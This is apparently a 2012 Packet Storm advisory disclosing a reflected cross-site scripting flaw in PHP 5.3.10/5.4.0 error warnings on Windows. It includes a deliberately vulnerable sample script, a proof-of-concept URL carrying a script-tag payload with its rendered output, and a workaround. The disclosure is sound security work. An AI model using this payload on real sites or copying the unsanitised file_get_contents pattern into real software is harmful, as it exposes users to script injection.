PHP 5.3.10 / 5.4.0 Cross Site Scripting

2012-04-09T00:00:00
ID PACKETSTORM:111695
Type packetstorm
Reporter Akastep
Modified 2012-04-09T00:00:00

Description

                                        
                                            `=============================================================================================  
Vulnerable Software: PHP 5.3.10/5.4.0  
  
php-5.3.10-Win32-VC9-x86.zip (MD5 SUM: af452dfa681ae03ff42eea6d1c7348cd )  
php-5.4.0-Win32-VC9-x86.zip (MD5 SUM: b1b0abe883f84eb6d76793aabf1aa612 )  
Downloaded From:windows.php.net  
=============================================================================================  
Tested:  
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586  
Apache from apachelounge.com: Version: 2.2.22.0  
=============================INFO============================================================  
PHP 5.3.10  
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586  
PHP Version 5.3.10  
Build Date Feb 2 2012 20:26:31  
Compiler MSVC9 (Visual C++ 2008)  
Architecture x86  
Configure Command cscript /nologo configure.js  
"--enable-snapshot-build" "--disable-isapi" "--enable-debug-pack" "--disable-isapi" "--without-mssql"  
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"  
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"  
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze"  
==============================================================================================  
PHP 5.4.0  
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586  
Build Date Feb 29 2012 19:20:16  
Compiler MSVC9 (Visual C++ 2008)  
Architecture x86  
Configure Command cscript /nologo configure.js "--enable-snapshot-build"  
"--disable-isapi" "--enable-debug-pack" "--disable-nsapi" "--without-mssql"  
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"  
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"  
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo"  
===============================================================================================  
  
  
Vuln Desc: Cross Site Scripting Vulnerabilities.  
Reason:Misconfiguration in php.ini-* file about:=> html_error <= directive  
Also insufficent sanitization when generating warnings which is manipulatable by client side.  
Problem in that PHP 5.3.10's php.ini "says":  
//Snippet from php.ini-production (This also applies to php.ini-development except display_errors)  
---------SNIP STUFF ------------------------  
display_errors = off  
----- SOME CONFIGURATION SNIP------------  
; When PHP displays or logs an error, it has the capability of inserting html  
; links to documentation related to that error. This directive controls whether  
; those HTML links appear in error messages or not. For performance and security  
; reasons, it's recommended you disable this on production servers.  
; Note: This directive is hardcoded to Off for the CLI SAPI  
; Default Value: On  
; Development Value: On  
; Production value: Off  
; http://php.net/html-errors  
html_errors = off  
------------EOF SNIP STUFF------------------------  
  
I Agree with: display_errors =off it works as expected but...  
Simply enable it: display_errors = off to On state. (display_errors = On)  
Restart Apache  
And exploitate:  
(lets say it is vulnerable script in server In eg:)  
  
cat step2.php  
/* BEGIN */  
<?php  
  
if(isset($_GET['test']))  
{  
  
file_get_contents($_GET['test']);  
  
}  
  
  
?>  
/* = EOF */  
  
Exploit:  
http://192.168.0.15/bypass/work/step2.php?test=../../../../../../../../../../../../../../<script>alert(document.location);</script>  
  
From source code of page:(Take a look it doesn't "htmlentitied" by PHP.(Non Persistent Cross Site Scripting Vuln))  
  
Warning: file_get_contents(): Unable to access ../../../../../../../../../../../../../../<script>alert(document.location);</script> in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6  
  
Warning: file_get_contents(../../../../../../../../../../../../../../<script>alert(document.location);</script>): failed to open stream: No such file or directory in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6  
  
Print screen:  
http://s019.radikal.ru/i634/1204/d8/ec8485e212bc.png  
  
  
All problem in that: html_errors = off doesn't works as expected.(Am i Confused or ?)  
  
(Note: In PHP Version 5.4.0 php.ini-production html_errors=On (<=In this state it is disabled) (This means it is off default.Because php 5.4.10 too is prone to this.  
For testing Change it to Off.It is also vulnerable))  
  
It "thinks" OFF state is ON and versa (OFF is ON)  
You can confirm it simply:  
change it to On state then restart Apache and try to exploitate like bottom.(It'll not work in this case.)  
Here is after changing= > html_errors=On <= state: (Changed to On state)  
  
From source code of page:(Take a look it is "htmlentitied" and safe now.)  
<br />  
<b>Warning</b>: file_get_contents(../../../../../../../../../../../../../../<script>alert(1);</script>) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Invalid argument in <b>C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php</b> on line <b>6</b><br />  
  
  
In fact on production servers => display_errors = off (default)<= so this suppress all this stuff.(This will mitigate this issuse.)  
  
Here is my md5 summary's:  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
$ md5sum php-5.3.10-Win32-VC9-x86.zip  
af452dfa681ae03ff42eea6d1c7348cd *php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox (same md5 summary)  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
$ md5sum 2/php-5.3.10-Win32-VC9-x86.zip  
af452dfa681ae03ff42eea6d1c7348cd *2/php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net (same md5 summary.See bottom)  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
$ ls -liaR  
.:  
total 15436  
44754521297054585 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 22:57 .  
3659174697249195 drwxrwxrwt+ 1 Domain Îòñóòñòâóåò 0 Apr 8 22:57 ..  
5629499534273522 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 23:01 2  
3659174697298844 -rwxrwxrwx+ 1 Ãîñòü Îòñóòñòâóåò 15805513 Feb 13 00:37 php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox  
  
./2:  
total 15436  
5629499534273522 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 23:01 .  
44754521297054585 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 22:57 ..  
26177172834151436 -rwxrwxrwx+ 1 user Îòñóòñòâóåò 15805513 Apr 8 22:12 php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net  
  
me@localhost.localdomain /cygdrive/c/temp/mydirsnap  
  
  
Note: Not tested under Linux.Tested *Only* under Windows Server 2003 OS.  
  
  
  
  
********************************************** Workaround *******************************************  
After playing with html_error=on/off test your server like bottom)  
Turn off all Display_erros in your php.ini (Suppress all errors,warnings and do not output  
anything to client side)  
****************************************************************************************************  
  
  
/AkaStep ^_^  
Greetz to all:  
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!  
Thank you.  
`